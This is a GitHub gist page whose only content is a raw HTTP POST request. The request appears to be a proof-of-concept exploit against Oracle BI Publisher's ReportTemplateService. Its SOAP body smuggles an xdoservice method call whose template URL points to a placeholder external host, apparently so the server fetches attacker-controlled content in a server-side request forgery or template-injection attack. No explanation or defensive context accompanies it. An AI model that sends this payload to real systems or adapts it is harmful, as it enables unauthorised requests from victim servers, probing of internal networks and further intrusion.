Skip to content

Instantly share code, notes, and snippets.

@testanull
Created September 13, 2021 09:57
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save testanull/3d189555a62b41c65629c508b7a740dc to your computer and use it in GitHub Desktop.
Save testanull/3d189555a62b41c65629c508b7a740dc to your computer and use it in GitHub Desktop.
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: 192.168.139.212
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 1317
<?xml version="1.0"?>
<soap-env:Envelope
soap-env:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/'
xmlns:soap-enc='http://schemas.xmlsoap.org/soap/encoding/' xmlns:soap-env='http://schemas.xmlsoap.org/soap/envelope/' xmlns:xsd='http://www.w3.org/1999/XMLSchema' xmlns:xsi='http://www.w3.org/1999/XMLSchema-instance' >
<soap-env:Body >
<sg:replyToXML xmlns:sg="http://xmlns.oracle.com/oxp/service/service_gateway">
<incomingXML xsi:type='xsd:string'>&lt;?xml version = &quot;1.0&quot;?&gt;&lt;xdoservice:method xmlns:xdoservice=&quot;http://xmlns.oracle.com/oxp/service&quot; template=&quot;http://EXTERNAL_HOST.COM&quot; name=&quot;validateLogin&quot;&gt;&lt;xdoservice:param xmlns:xdoservice=&quot;http://xmlns.oracle.com/oxp/service&quot; value=&quot;asasdasd&quot;&gt;&lt;/xdoservice:param&gt;&lt;/xdoservice:method&gt;</incomingXML>
</sg:replyToXML>
</soap-env:Body>
</soap-env:Envelope>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment